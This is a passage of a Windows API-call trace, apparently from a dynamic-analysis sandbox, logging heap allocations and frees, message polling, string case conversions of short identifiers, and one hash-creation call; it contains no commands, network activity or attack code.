(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.568] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.569] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.570] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.571] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.571] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.572] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.572] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.572] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.572] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.573] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.573] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.574] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.574] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0252.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.575] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.575] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.576] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.576] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.576] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.576] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.576] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.577] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.577] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.577] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.577] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.577] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.578] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.578] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.578] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.578] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.578] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.578] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.578] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0252.578] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.578] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.578] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.578] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.579] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0252.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.579] PeekMessageW (in: lpMsg=0x8bf3c0, 